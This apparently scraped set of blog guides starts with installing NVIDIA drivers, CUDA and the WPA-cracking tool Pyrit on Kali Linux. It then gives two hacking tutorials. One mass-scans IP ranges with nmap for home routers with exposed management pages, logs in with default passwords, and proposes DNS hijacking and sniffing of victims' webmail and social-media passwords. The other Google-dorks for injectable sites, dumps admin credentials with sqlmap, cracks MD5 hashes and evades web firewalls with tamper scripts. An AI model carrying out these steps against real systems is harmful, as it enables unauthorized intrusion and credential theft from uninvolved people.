The new Linux binary NVIDIA driver nvidia-kernel-dkms builds the NVIDIA Xorg binary kernel module needed by the NVIDIA driver, using DKMS. Provided that you have the kernel header packages installed, the kernel module will be built for your running kernel and automatically rebuilt for any new kernel headers that are installed. The binary NVIDIA drivers provide optimized hardware acceleration of OpenGL applications via a direct-rendering X server for graphics cards using NVIDIA chipsets. AGP, PCIe, SLI, TV-out and flat panel displays are also supported. NVIDIA added support for the following GPUs and fixed some issues (existing GPUs are already supported):

  • GeForce GT 710
  • GeForce 825M
  1. Fixed a regression that prevented NVIDIA-installer from cleaning up directories created as part of the driver installation.
  2. Added a new X configuration option “InbandStereoSignaling” to enable/disable DisplayPort in-band stereo signaling.
  3. Fixed a bug that caused PBO downloads of cube map faces to retrieve incorrect data.
  4. Fixed a bug in NVIDIA-installer that resulted in spurious error messages when opting out of installing the NVIDIA kernel module or source files for the kernel module.
  5. Added experimental support for ARGB GLX visuals when Xinerama and Composite are enabled at the same time on X.Org xserver 1.15.

See the details about this driver in NVIDIA official website:

Debian Linux usually ports the official driver to fit its requirements. The graphics processing unit (GPU) series/codename of an installed video card can usually be identified using the lspci command. For example:

lspci -nn | grep VGA
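As a quick sketch of what to look for in that output, here is how you might pull the GPU name out of a sample lspci line. The line below is illustrative (the PCI IDs are placeholders); in practice, pipe the real `lspci -nn | grep VGA` output through the same grep.

```shell
# Sample lspci line (hypothetical); substitute real `lspci -nn | grep VGA` output.
pci="01:00.0 VGA compatible controller [0300]: NVIDIA Corporation GT218 [GeForce 210] [10de:0a65] (rev a2)"
# Extract just the GPU model name.
gpu=$(echo "$pci" | grep -o 'GeForce [0-9]*')
echo "$gpu"
```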

My settings

My PC got the following configuration:

I’ve installed everything on a brand new Kali Linux 1.0.6 installation, fully updated and upgraded. Before you do anything, of course, add the official Kali Linux repositories. Once I’d added the correct official repositories, I issued the following commands to update, upgrade and dist-upgrade my Kali Linux.

apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

If you’ve completed this part, move on to the next instruction.

Step 1: Install Linux headers

Install Linux headers as those will be required to build NVIDIA Driver modules.

aptitude -r install linux-headers-$(uname -r)

Where -r means install all recommended packages as well.   
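Before building anything, it can save time to confirm the headers actually landed for the running kernel. A small hedged check (assuming the usual Debian/Kali path layout under /usr/src):

```shell
# Check whether headers matching the running kernel are present.
hdr="/usr/src/linux-headers-$(uname -r)"
if [ -d "$hdr" ]; then
  status="headers present: $hdr"
else
  status="headers missing; run: aptitude -r install linux-headers-$(uname -r)"
fi
echo "$status"
```

If the headers are missing, the DKMS build in the next steps will fail, so fix this first.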

Step 2: Install NVIDIA Kernel

Next I installed NVIDIA Kernel

apt-get install nvidia-kernel-$(uname -r)

Step 3: Install NVIDIA Driver Kernel DKMS

We’re almost ready. You can now install new NVIDIA driver nvidia-kernel-dkms by using the following command:

aptitude install nvidia-kernel-dkms

Including dependencies, this is about 24MB in size; depending on how fast the Kali repo is, you might have to wait a few minutes. You will get two popups: the first one about rebooting after you’ve installed the NVIDIA driver nvidia-kernel-dkms (it will disable the open source NVIDIA driver nouveau), and the second one about the xorg.conf file in the /etc/X11/ folder.

Press OK on both popups.

Step 4: Install xconfig NVIDIA driver application

If you go through the NVIDIA driver README document, you will see that you need to create a new Xorg server configuration file xorg.conf, or modify the existing xorg.conf, to tell it to load the NVIDIA driver module. The nvidia-xconfig package makes this task much easier. All you need to do is install and execute it.

aptitude install nvidia-xconfig

Step 5: Generate Xorg server configuration file

Now that we have installed nvidia-xconfig package, issue the following command to generate Xorg server configuration file.

nvidia-xconfig
It will rename any existing xorg.conf file and create a new one. As directed by the NVIDIA driver nvidia-kernel-dkms, reboot your machine to complete the installation.

Step 6: Confirming your installation

At this point you should be able to login to your system in Graphical User Mode (GUI). In case you can’t, follow the troubleshooting section at the bottom of this article. As always, we need to check if everything went as expected.

Step 6.a: Check GLX Module

First check if the system is using the glx module.

glxinfo | grep -i "direct rendering"

It should output “direct rendering: Yes”


If you do not have glxinfo, first install the mesa-utils package, then issue the above command again and check the output:

aptitude install mesa-utils

Step 6.b: Check NVIDIA Driver Module

Check if NVIDIA module loaded.

lsmod | grep nvidia

If it produces output like nvidia 9442880 28 or something similar (the numbers could be different on your system), then the NVIDIA module is loaded.

Step 6.c: Check for Open source NVIDIA Driver nouveau module

Just to be sure the open source NVIDIA driver nouveau module is NOT loaded, issue the following command:

lsmod | grep nouveau


It should NOT produce any output. If it produces output then something is wrong.

Step 6.d: Confirm if open source NVIDIA Driver nouveau was blacklisted

I like this new NVIDIA driver. It blacklists the open source NVIDIA driver nouveau by default, which means less work for us. You can confirm it by checking the files in the following directory:

cat /etc/modprobe.d/nvidia.conf
cat /etc/modprobe.d/nvidia-blacklists-nouveau.conf
cat /etc/modprobe.d/nvidia-kernel-common.conf
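Steps 6.b and 6.c can be combined into one quick status check. The sketch below runs against a sample lsmod snapshot (the module sizes are hypothetical); in practice, replace the `modules` variable with the output of the real `lsmod` command.

```shell
# Sample lsmod snapshot (hypothetical values); for real use: modules=$(lsmod)
modules="nvidia 9442880 28
drm 249955 3 nvidia"
# nouveau should be absent, nvidia should be loaded.
if echo "$modules" | grep -q '^nouveau'; then nouveau_status="nouveau loaded (problem)"; else nouveau_status="nouveau absent (good)"; fi
if echo "$modules" | grep -q '^nvidia'; then nvidia_status="nvidia loaded (good)"; else nvidia_status="nvidia absent (problem)"; fi
echo "$nouveau_status"
echo "$nvidia_status"
```

If either line reports a problem, go back to the relevant step before continuing.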


You might get a black screen after installing the NVIDIA driver. The following are your options to fix it:

Troubleshooting Step A: Fixing black screen with a cursor problem

Simply press CTRL + ALT + F1 and login. Type the following


You should now be able to log in using the GDM3 GUI.

Troubleshooting Step B: Delete xorg.conf file

Press CTRL + ALT + F1 and login. Type the following

rm /etc/X11/xorg.conf

After reboot, you should be able to log in using the GDM3 GUI.

Troubleshooting Step C: remove NVIDIA Driver

Press CTRL + ALT + F1 and login. Type the following

apt-get remove nvidia-kernel-dkms

After reboot, you should be able to log in using the GDM3 GUI.


This concludes my general instructions on how to install the proprietary NVIDIA driver on Kali Linux – NVIDIA Accelerated Linux Graphics Driver. NVIDIA Optimus users should be able to follow the same instructions; however, as I said before, feel free to share your side of the story on how your installation went and correct my guide if required. I am open to discussion and will try to reply to your comments as early as possible. For those with curious minds, try installing nvidia-settings and see how that goes. Installing NVIDIA Settings will remove the NVIDIA driver, but I did manage to make it work with some tinkering. I will try to write another guide on that (NVIDIA Settings presents you with a GUI X Config window where you can see GPU temperature and more info). The proprietary “NVIDIA Accelerated Linux Graphics Driver” provides optimized hardware acceleration of OpenGL applications via a direct-rendering X server; in short, your NVIDIA driver gives you a better display and 3D rendering, and you’re all done. You can now play 3D games. Let me know if you want any specific Linux supported games on Kali and I can write up an article on that. But if you want to run applications that use the NVIDIA kernel module CUDA, Pyrit and Cpyrit for GPU processing, then you will also need to install the CUDA drivers, replace official Pyrit and install Cpyrit. Find out if your graphics card supports CUDA on the following page from NVIDIA.

Mine does,

  • GeForce 210.

The next guide will show you how to install the NVIDIA kernel module CUDA and Pyrit in Kali Linux – CUDA, pyrit and cpyrit. Thanks for reading. If this guide helped you to install the NVIDIA driver, please share this article and follow us on Facebook/Twitter.

Install NVIDIA driver kernel Module CUDA and Pyrit on Kali Linux – CUDA, Pyrit and Cpyrit-cuda

In this guide, I will show how to install the NVIDIA driver kernel module CUDA, replace stock Pyrit, and install Cpyrit. At the end of this guide, you will be able to use GPU acceleration in enabled applications such as cudaHashcat, Pyrit, crunch etc.

You use the first guide to install NVIDIA Driver on Kali Linux. I would assume you followed the first guide and completed all steps there and would like to enable GPU acceleration, (cudahashcat, GPU pass through etc.) on your Kali Linux.

CUDA Toolkit

The NVIDIA® CUDA® Toolkit provides a comprehensive development environment for C and C++ developers building GPU-accelerated applications. The CUDA Toolkit includes a compiler for NVIDIA GPUs, math libraries, and tools for debugging and optimizing the performance of your applications. You’ll also find programming guides, user manuals, API reference, and other documentation to help you get started quickly accelerating your application with GPUs. You can read a lot more here in NVIDIA Developers official webpage:

CUDA Toolkit


The following are the prerequisites before you start following this guide:

Prerequisite 1: add Official Kali Linux repository.

I’ve added the correct Kali Official repositories and issued the following commands to update, upgrade and dist-upgrade my Kali Linux.

apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

Prerequisite 2: Install proprietary NVIDIA driver on Kali Linux

I’ve installed the correct official proprietary NVIDIA driver on Kali Linux – NVIDIA Accelerated Linux Graphics Driver using the previous guide.

If you’ve completed both, move to next instruction.

Step 1: Install NVIDIA CUDA toolkit and openCL

At first we need to install NVIDIA CUDA toolkit and NVIDIA openCL

aptitude install nvidia-cuda-toolkit nvidia-opencl-icd

This will install the CUDA packages on your Kali Linux. The total package is pretty large including dependencies (282MB or so), so be patient and let it finish.
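Once the toolkit is installed, a quick check for the CUDA compiler confirms the packages landed (nvcc ships with nvidia-cuda-toolkit). This sketch degrades gracefully if nvcc is not on the PATH:

```shell
# Verify the CUDA compiler is installed and on the PATH.
if command -v nvcc >/dev/null 2>&1; then
  cuda_status="nvcc found: $(nvcc --version | tail -n 1)"
else
  cuda_status="nvcc not found; check the nvidia-cuda-toolkit install"
fi
echo "$cuda_status"
```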

Step 2: Download Pyrit and Cpyrit

Download Pyrit and Cpyrit from the official website:

Save them in your /root folder.

Step 3: Install Pyrit

Follow the instructions below to install Pyrit and its prerequisites.

Step 3.a: Install Pyrit prerequisites

apt-get install python2.7-dev python2.7-libpcap libpcap-dev

Step 3.b: Remove existing installation of Pyrit

Remove stock Pyrit using the following command:

apt-get remove pyrit

You will get a message stating that it will also remove the kali-linux-full package. It actually doesn’t; all it does is update the Kali repo metadata and remove Pyrit. Finish removing Pyrit.

If you are not using a clean install of Kali (not recommended), you may need to issue the following command:

rm -r /usr/local/lib/python2.7/dist-packages/cpyrit/

Step 3.c: Install new Pyrit

Copy paste the following commands to extract downloaded Pyrit in your Kali Linux /root directory

tar -xzf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0

Now build the package

python setup.py build

Once build is complete, you can install Pyrit.

python setup.py install

Up to this point, you shouldn’t receive any errors.

Step 4: Install CPyrit-cuda

Copy paste the following commands to extract downloaded CPyrit-cuda in your Kali Linux /root directory

tar -xzf cpyrit-cuda-0.4.0.tar.gz 
cd cpyrit-cuda-0.4.0

Now build the package

python setup.py build

Once build is complete, you can install CPyrit-cuda.

python setup.py install

Again, you shouldn’t receive any errors; if there’s an error, go back and review each step.

Step 5: Testing and troubleshooting

Now that we’ve installed NVIDIA driver kernel Module CUDA and Pyrit on Kali Linux, we should be able to test it. The best way to test is by issuing the following command:

pyrit list_cores

This gave me the error “bash: /usr/bin/pyrit: No such file or directory”.

It seems this Pyrit puts its binaries in a different folder than you’d expect. The actual path for Pyrit is now /usr/local/bin/pyrit

Step 5.a Softlink them or add path to profile

There are two ways you can resolve it: you can either softlink the binary or add the /usr/local/bin path to your profile. The choice is again yours.

Step 5.a.i: Softlinking

This is what I’ve followed:

ln -s /usr/local/bin/pyrit /usr/bin/pyrit

Step 5.a.ii: Add path

If you want it only for a specific user, edit ~/.bash_profile or ~/.bashrc and put this there:

export PATH=$PATH:/usr/local/bin

If you want it for all users, edit /etc/profile and scroll down until you see something like:

 PATH="/bin:/usr/bin:/sbin:/usr/sbin" export PATH

Append /usr/local/bin to the end. It will be:

 PATH="/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin" export PATH
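The append step can also be scripted so it is idempotent (safe to run twice). This sketch works on a scratch file so you can see the result; for real use, point it at /etc/profile instead.

```shell
# Demonstrate appending /usr/local/bin to a profile's PATH line on a scratch file.
profile=$(mktemp)
echo 'PATH="/bin:/usr/bin:/sbin:/usr/sbin"' > "$profile"
# Only append if /usr/local/bin is not already present.
grep -q '/usr/local/bin' "$profile" || \
  sed -i 's#^PATH="\(.*\)"#PATH="\1:/usr/local/bin"#' "$profile"
newpath=$(cat "$profile")
echo "$newpath"
rm -f "$profile"
```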
and Finally

Once you’ve either softlinked or added the correct path to your profile, the following is what you get:

root@kali:~# pyrit list_cores
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg
This code is distributed under the GNU General Public License v3+

The following cores seem available...
#1:  'CUDA-Device #1 'GeForce 210''
#2:  'CPU-Core (SSE2)'
#3:  'CPU-Core (SSE2)'
#4:  'CPU-Core (SSE2)'

and of course I did a benchmark with my GeForce 210 card:

root@kali:~# pyrit benchmark
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg
This code is distributed under the GNU General Public License v3+

Running benchmark (2744.1 PMKs/s)... -

Computed 2744.11 PMKs/s total.
#1: 'CUDA-Device #1 'GeForce 210'': 853.1 PMKs/s (RTT 3.0)
#2: 'CPU-Core (SSE2)': 648.1 PMKs/s (RTT 2.8)
#3: 'CPU-Core (SSE2)': 647.6 PMKs/s (RTT 2.9)
#4: 'CPU-Core (SSE2)': 658.5 PMKs/s (RTT 3.0)


Pyrit allows you to create massive databases, pre-computing part of the IEEE 802.11 WPA/WPA2-PSK authentication phase in a space-time tradeoff. Exploiting the computational power of many-core and other platforms through ATI-Stream, NVIDIA CUDA and OpenCL, it is currently by far the most powerful attack against one of the world’s most used security protocols.

Here’s a great benchmark done with Pyrit and CUDA for different GPUs.

Thanks for reading. If this guide helped you to install the NVIDIA driver kernel module CUDA and Pyrit on Kali Linux – CUDA, Pyrit and Cpyrit-cuda, please share this article and follow me on Facebook/Twitter.

ah and don’t forget to show off your Pyrit Benchmark. ;)

Router Hack – How to hack ADSL router using NMAP

An asymmetric digital subscriber line (DSL or ADSL) modem is a device used to connect a computer or router to a telephone line which provides the digital subscriber line service for connectivity to the Internet, often called DSL or ADSL broadband. In this guide I will show you how to scan an IP range for connected ADSL or DSL modem routers and hack a DSL ADSL router remotely. This guide applies to Windows, Linux or Mac, so it doesn’t matter what your operating system is; you can try the same steps from all these operating systems. The term DSL or ADSL modem is technically used to describe a modem which connects to a single computer through a USB port or is installed in a computer PCI slot. The more common DSL or ADSL router, which combines the function of a DSL or ADSL modem and a home router, is a standalone device which can be connected to multiple computers through multiple Ethernet ports or an integral wireless access point. Also called a residential gateway, a DSL or ADSL router usually manages the connection and sharing of the DSL or ADSL service in a home or small office network.

Put this together with Wireshark hacking for http websites and you’ve got a nightmare for the user behind that router, as all their passwords and details can be tracked very easily.

What’s in a DSL ADSL Router?

A DSL or ADSL router consists of a box which has an RJ11 jack to connect to a standard subscriber telephone line. It has several RJ45 jacks for Ethernet cables to connect it to computers or printers, creating a local network. It usually also has a USB jack which can be used to connect to computers via a USB cable, to allow connection to computers without an Ethernet port. A wireless DSL or ADSL router also has antennas to allow it to act as a wireless access point, so computers can connect to it forming a wireless network. Power is usually supplied by a cord from a wall wart transformer. It usually has a series of LED status lights which show the status of parts of the DSL or ADSL communications link:

  1. Power light – indicates that the modem is turned on and has power.
  2. Ethernet lights – There is usually a light over each Ethernet jack. A steady (or sometimes flashing) light indicates that the Ethernet link to that computer or device is functioning
  3. DSL or ADSL light – a steady light indicates that the modem has established contact with the equipment in the local telephone exchange (the DSLAM), so the DSL or ADSL link over the telephone line is functioning
  4. Internet light – a steady light indicates that the IP address and DHCP protocol are initialized and working, so the system is connected to the Internet
  5. Wireless light – only in wireless DSL or ADSL modems, this indicates that the wireless network is initialized and working

Almost every ADSL DSL modem router provides a management web-page, available via the internal network (LAN, or local area network), for device management, configuration and status reporting. You are supposed to log in to the management web-page and configure a username/password combination provided by your ISP (Internet service provider), which then allows you to connect to the internet. The network is divided into two parts:

External Network

External network indicates the part where the ADSL DSL modem router connects to the upstream provider for internet connectivity. Once connected to the ISP via a phone line (ADSL DSL modem routers can use conventional copper phone lines to connect to the ISP at a much higher speed), the router gets an IP address. This is usually a publicly routable IP address which is open to the whole world.

Internal Network

Internal network indicates the part where devices in the local area network connect to the ADSL DSL modem router via either wireless or an Ethernet cable. Most modern DSL ADSL modem routers run a DHCP server internally which assigns an internal IP address to each connected device. When I say device, this can be anything from a conventional computer, a laptop, a phone (Android, Apple, Nokia or Blackberry etc.), a smart TV, a car, NAS, SAN, an orange, a banana, a cow, a dragon, Harry Potter … I mean anything that’s able to connect to the internet! So you get the idea. Each device gets its own IP address, a gateway IP and DNS entries. Depending on the DSL ADSL modem router this can be slightly different, but the idea remains the same: the DSL ADSL router allows users to share internet connectivity. These DSL ADSL modem routers are like miniature gateway devices that can have many services running on them. Usually they all use BusyBox or similar proprietary Linux applications. You want to know what a DSL ADSL router can do? Here’s a list of common services that can run on a DSL ADSL modem router:

  1. ADSL2 and/or ADSL2+ support
  2. Antenna/ae (wireless)
  3. Bridge/Half-bridge mode
  4. Cookie blocking
  5. DHCP server
  6. DDNS support
  7. DoS protection
  8. Switching
  9. Intrusion detection
  10. LAN port rate limiting
  11. Inbuilt firewall
  12. Inbuilt or Free micro-filter
  13. Java/ActiveX applet blocking
  14. Javascript blocking
  15. MAC address filtering
  16. Multiple public IP address binding
  17. NAT
  18. Packet filter
  19. Port forwarding/port range forwarding
  20. POP mail checking
  21. QoS (especially useful for VoIP applications)
  22. RIP-1/RIP-2
  23. SNTP facility
  24. SPI firewall
  25. Static routing
  26. So-called “DMZ” facility
  27. RFC1483 (bridged/routed)
  28. IPoA
  29. PPPoE
  30. PPPoA
  31. Embedded PPPoX login clients
  32. Parental controls
  33. Print server inbuilt
  34. Scheduling by time/day of week
  35. USB print server
  36. URL blocking facility
  37. UPnP facility
  38. VPN pass-through
  39. Embedded VPN servers
  40. WEP 64/128/256 bit (wireless security)
  41. WPA (wireless security)
  42. WPA-PSK (wireless security)

That’s a lot of services running on a small device, configured by nanny, granny, uncle, aunt and the next door neighbour; in short, many non-technical people around the world. How many of those are configured badly? Ports left open left, right and center? Default admin passwords never changed? Many! I mean MANY! In this guide we will use nmap to scan a range of IP addresses; from the output we will determine which are DSL ADSL routers and have left their management ports open to the external network (again, read the top section to know which one is the external network). A typical ADSL router’s management interface is available via the following URL:

This is the management page for the DSL ADSL modem router and it’s always protected by a password. By default, this password is written on a sticker underneath the router, and it is usually one of these username/password combinations:


A lot of home users don’t change this password. Well, that’s OK; it doesn’t hurt much, because it is only available via a connected device. But what’s not okay is when users open up their management interface to the external network. All you need to know is the public IP address of your target, then just try to access the management page externally.

Installing NMAP

I use Kali Linux which comes with NMAP Preinstalled. If you are using Windows or Mac (or any other flavour of Linux) go to the following website to download and install NMAP.

Linux Installation:

For Ubuntu, Debian or aptitude based system NMAP is usually made available via default repository. Install NMAP using the following command:

sudo apt-get install nmap

For YUM Based systems such as Redhat, CentOS, install via

sudo yum install nmap

For PACMAN based systems such as Arch Linux, install via

sudo pacman -S nmap

Windows Installation:

For Windows Computers, download installer and run the executable. Link:

Mac Installation:

For Mac users, download installer and install Link:

Official NMAP site

You can read more about NMAP here:

Search for Vulnerable Routers

Now that we have NMAP sorted, we are going to run the following command to scan for ADSL modem routers, based on their banner on port 80, to start our ADSL router hack. All you need to do is pick an IP range. I’ve used an example range below.

Search from Linux using command Line

In Linux run the following command:

nmap -sS -sV -vv -n -Pn -T5 -p80 -oG - | grep 'open' | grep -v 'tcpwrapped'

In Windows or Mac open NMAP and copy paste this line:

nmap -sS -sV -vv -n -Pn -T5 -p80 -oG -

Once it finds the results, search for the word ‘open’ to narrow them down. A typical Linux NMAP command would return output like the lines below (and of course I’ve changed the IP details):

Host: ()  Ports: 80/open/tcp//tcpwrapped///
Host: ()  Ports: 80/open/tcp//http//micro_httpd/
Host: ()  Ports: 80/open/tcp//tcpwrapped///
Host: () Ports: 80/open/tcp//tcpwrapped///
Host: () Ports: 80/open/tcp//http//Fortinet VPN|firewall http config/
Host: () Ports: 80/open/tcp//tcpwrapped///
Host: () Ports: 80/open/tcp//http?///
Host: () Ports: 80/open/tcp//tcpwrapped///
Host: () Ports: 80/open/tcp//http?///
Host: () Ports: 80/open/tcp//http?///
Host: () Ports: 80/open/tcp//http//Gadspot|Avtech AV787 webcam http config/
Host: () Ports: 80/open/tcp//http?///
Host: () Ports: 80/open/tcp//ssl|http//thttpd/
Host: () Ports: 80/open/tcp//http?///
Host: () Ports: 80/open/tcp//tcpwrapped///
Host: () Ports: 80/open/tcp//http//Gadspot|Avtech AV787 webcam http config/
Host: () Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: () Ports: 80/open/tcp//http//Apache httpd/
Host: () Ports: 80/open/tcp//http//micro_httpd/
Host: ()        Ports: 80/open/tcp//http?///
Host: ()        Ports: 80/open/tcp//http?///
Host: ()        Ports: 80/open/tcp//tcpwrapped///
Host: ()        Ports: 80/open/tcp//tcpwrapped///
Host: ()        Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: ()        Ports: 80/open/tcp//tcpwrapped///
Host: ()        Ports: 80/open/tcp//http//micro_httpd/
Host: ()        Ports: 80/open/tcp//http//Microsoft IIS httpd 6.0/
Host: ()        Ports: 80/open/tcp//tcpwrapped///
Host: ()        Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: ()        Ports: 80/open/tcp//http?///
Host: ()        Ports: 80/open/tcp//tcpwrapped///
Host: ()        Ports: 80/open/tcp//tcpwrapped///
Host: ()        Ports: 80/open/tcp//http//Apache httpd 2.2.15 ((CentOS))/
Host: ()        Ports: 80/open/tcp//tcpwrapped///
Host: ()        Ports: 80/open/tcp//http//Allegro RomPager 4.51 UPnP|1.0 (ZyXEL ZyWALL 2)/

This was taking a long time (we are, after all, trying to scan 256 hosts with the command above). Being impatient, I wanted to check whether my Kali Linux machine was actually doing anything for this ADSL router hack. I used the following command in a separate terminal to monitor what my PC was doing… it was doing a lot:

tcpdump -ni eth0

That’s a lot of connected hosts with TCP port 80 open. Some are marked ‘tcpwrapped’, which means they are probably not accessible.
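As a side note, the greppable (-oG) output shown above is easy to post-process. Here is a minimal sketch (the host addresses and the file name are illustrative only, not from a real scan) that keeps hosts with port 80 open and skips the ‘tcpwrapped’ ones:

```shell
# Stand-in sample of nmap -oG (greppable) output; a real file would come
# from an actual scan saved with -oG. The hosts below are made up.
cat > scan.gnmap <<'EOF'
Host: 10.0.0.1 ()  Ports: 80/open/tcp//tcpwrapped///
Host: 10.0.0.2 ()  Ports: 80/open/tcp//http//micro_httpd/
Host: 10.0.0.3 ()  Ports: 80/open/tcp//http//Apache httpd/
EOF

# Keep lines with an open port, drop the tcpwrapped ones, and print
# the host address (the second whitespace-separated field).
grep 'open' scan.gnmap | grep -v 'tcpwrapped' | awk '{print $2}'
```

The same pipeline works directly on live output if you pipe the nmap command into it, which is exactly what we do further down.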

Search from Windows, Mac or Linux using GUI – NMAP or Zenmap

Assuming you’ve got your NMAP installation sorted, you can now open NMAP (in Kali Linux or a similar Linux distro you can use Zenmap, the cross-platform GUI version of NMAP). Copy and paste the following line into the Command field:

nmap -sS -sV -vv -n -Pn -T5 -p80 -oG -

Another version of this command uses a different representation of the subnet mask.

nmap -sS -sV -vv -n -Pn -T5 -p80 -oG -

Press the SCAN button and wait a few minutes until the scan is over.

Remote Router Hack - Hack ADSL router using NMAP - blackMORE Ops - 4

Once you have some results, you need to find the devices with open ports. In the search results page:

  1. Click on Services Button
  2. Click on http Service
  3. Click on Ports/Hosts TAB (Twice to sort them by status)

As you can see, I’ve found a few devices with open http port 80.

Remote Router Hack - Hack ADSL router using NMAP - blackMORE Ops - 5

It is quite amazing how many devices have open ports facing the outside world.

Access Management Webpage

Pick one at a time. For example try this:

You get the idea. If it opens a webpage asking for a username and password, try one of the following combinations:


If you can find the router’s model number and make, you can look up the exact default username and password on this webpage:

Before we finish up: I am sure you were as impatient as I was, because a lot of the routers had ‘tcpwrapped’ on them, which was stopping us from reaching the web management interface. The following command will exclude those devices from our search. I’ve also expanded the search to a broader range using a slightly different subnet mask.

nmap -sS -sV -vv -n -Pn -T5 -p80 -oG - | grep 'open' | grep -v 'tcpwrapped'

In this command I am using a /22 subnet mask and filtering the output in two ways: I am looking for the word ‘open’ and excluding ‘tcpwrapped’. As you can see, I still get a lot of output.


You’ll be surprised how many still have the default username and password enabled. Once you have access to the router, you can do a lot more with this ADSL router hack, like DNS hijacking or stealing usernames and passwords (for example social media and webmail credentials for Facebook, Twitter, etc.) using tcpdump/snoop on the router’s interface.

There are many things you can do once you’ve got access to a router: change DNS settings, set up tcpdump and later snoop plaintext passwords with Wireshark, and so on. If you know a friend, family member, colleague or neighbour who didn’t change their router’s default password, let them know of the risks.

I am not here to judge whether it should be done or not, but this is definitely a way to gain access to a router. Hacking is not always bad; it is sometimes required when you lose access or a system just won’t respond. As a pentester, you should raise awareness. Share this guide, as anyone who uses Linux, Windows or Mac can use it to test their own network and fix this ADSL router issue.

Playing With SQL Injection And Firewall Bypassing



Most cyber-attacks in the world that involve websites occur due to a lack of updates and configuration faults, which result in successful exploitation.

One of the main threats is SQL injection, which has left many programmers worried about their systems and SQL databases.

The biggest problem is not the DBMS itself but the lack of validation of the input fields in web applications.


Many web developers do not know how SQL queries can be manipulated and assume that an SQL query is a trusted command. This allows SQL queries to circumvent access controls, thereby bypassing standard authentication and authorization checks. Sometimes SQL queries may even allow access to a command shell at the operating-system level of the server.

Direct injection of SQL commands is a technique where an attacker creates or alters existing SQL commands to expose hidden data, override valuable data, or even execute dangerous system-level commands on the server.


Structured Query Language (SQL) is the standard declarative language for relational databases, valued for its simplicity and ease of use.

SQL was originally developed in the early 70s at IBM labs.

sqlmap is a tool used to find and exploit this type of vulnerability.

It is an open-source penetration-testing tool, written in Python, that detects and exploits SQL injection (SQLi) vulnerabilities in fragile DBMSs. Let’s walk through an example, applicable to most operating systems and databases.


Readers, I will try to explain this in the simplest possible way.

You must have a vulnerable target. To find out whether a target is vulnerable, just add a single quote (') at the end of the URL being tested and press Enter; if an error is returned, the database is likely vulnerable.

You can use Google to find targets with a dork. Example: inurl:news.php?id=1

There is a whole database of Google dorks, and several other filters you can use to narrow your search.

cd /pentest/database/sqlmap

We will now begin the game. To view the help menu, use the command ./sqlmap.py -h

Let’s run the parameter --dbs to enumerate all the databases in the DBMS.

Or use the parameter --current-db to show the database currently in use.

The parameter -D selects the target database, and --tables lists its tables.

We will check for interesting information in the table (admin_users); time to list the columns. The parameter is --columns.

It is important to always indicate the target database (-D) before listing tables, because if you do not, it will list all tables in all databases.

-T = target table

-C = target column(s); more than one column can be chosen. Example: username,password

--dump = obtain, extract data.

Also important to remember is the parameter --proxy, which enables the use of a proxy.
Example: ./sqlmap.py --url "<target URL>" --dbs --proxy="<proxy URL>"
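Putting the parameters above together, the typical enumeration flow looks like this. This is only a sketch: the target URL, database name and table name here are hypothetical stand-ins.

```shell
SQLMAP="./sqlmap.py"
TARGET="http://testsite.example/news.php?id=1"   # hypothetical target

# Each step narrows the search: databases -> tables -> columns -> data.
step1="$SQLMAP -u $TARGET --dbs"
step2="$SQLMAP -u $TARGET -D sitedb --tables"
step3="$SQLMAP -u $TARGET -D sitedb -T admin_users --columns"
step4="$SQLMAP -u $TARGET -D sitedb -T admin_users -C username,password --dump"

printf '%s\n' "$step1" "$step2" "$step3" "$step4"
```

Run the steps one at a time and feed what each one discovers into the next.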

Readers, I think that’s the basics for beginners. sqlmap also has many other interesting functions; I suggest researching --prefix=PREFIX, --postfix=POSTFIX and the takeover options.

More information about the program, and videos of it in action, can be found on the official site.

--dump extracts the data itself. The data lives inside a selected column, so you have to choose what to extract from which column; here I extracted the logins and passwords saved in the column.

Generally, the “password” fields in a DBMS are encrypted (hashed).

We then need to decrypt the passwords in order to access the target system.

We can then find a way to log into the system. But wait: the passwords are hashed with MD5, hahahaha. Submit your hash to an online MD5 lookup service and it may be reversed, or crack it by other means.


Readers, lucky for us, there are some awesome tamper scripts for sqlmap, which can be found in the latest development version from the Subversion repository.

svn checkout sqlmap-dev

In fact, the function of the tamper scripts is to modify the request in a way that escapes the detection rules of the WAF (Web Application Firewall). In some cases it may be necessary to combine several tamper scripts to fool the WAF. A complete list of tamper scripts can be found in the tamper/ directory of the sqlmap source.

Many enterprises often overlook current vulnerabilities and rely only on the firewall for protection. Unfortunately most, if not all, firewalls can be bypassed. So, gentlemen, I want to demonstrate how to use some of the new features of sqlmap to bypass WAFs/IDS.

Well, I’ll demonstrate some important tamper scripts that work with MySQL.

Hands-on: to begin using tamper scripts, you use the --tamper switch followed by the script name. In the example, we use the command:

Summary of

Quite simply, this script is useful for bypassing very weak web application firewalls (WAFs)…

Another interesting case: many WAFs url-decode the request once before running it through their set of rules, while the web server will url-decode it again anyway. A double-url-encoded payload therefore slips past the rules but still reaches the application intact. Since this trick works at the HTTP layer, it should work against any DBMS.

Example to use:
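The double-decode idea can be sketched in plain shell. This is illustrative only: the payload is a classic example, and the sed substitutions encode just quotes and spaces rather than being a complete URL encoder.

```shell
payload="1' OR '1'='1"

# First encoding pass: encode quotes and spaces (enough for illustration).
enc1=$(printf '%s' "$payload" | sed "s/'/%27/g; s/ /%20/g")

# Second pass: encode the percent signs themselves.
enc2=$(printf '%s' "$enc1" | sed 's/%/%25/g')

echo "single-encoded: $enc1"   # the form a WAF rule set expects to see
echo "double-encoded: $enc2"   # the form that actually goes over the wire

# A WAF that decodes once sees only the single-encoded form, so rules
# looking for a quote character never fire; the web server decodes a
# second time and hands the original payload to the application.
```

This is exactly the effect a double-encoding tamper script automates for every request sqlmap sends.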

We will now demonstrate a tamper script against additional security. A vast number of organizations have deployed a WAF, and this is the tricky part of exploiting such an environment: standard SQL injection attack vectors will not work, and neither will plain scripts.

That is the reason we use tamper scripts: this facility gives us a quiet way to bypass web application firewalls.
Guys, I have demonstrated just a few of the many tamper scripts. I highly recommend testing them all, as each one is useful in different situations.
Note: this is not a tool for script kiddies. It is of the utmost importance to use such a powerful tool responsibly and maturely.

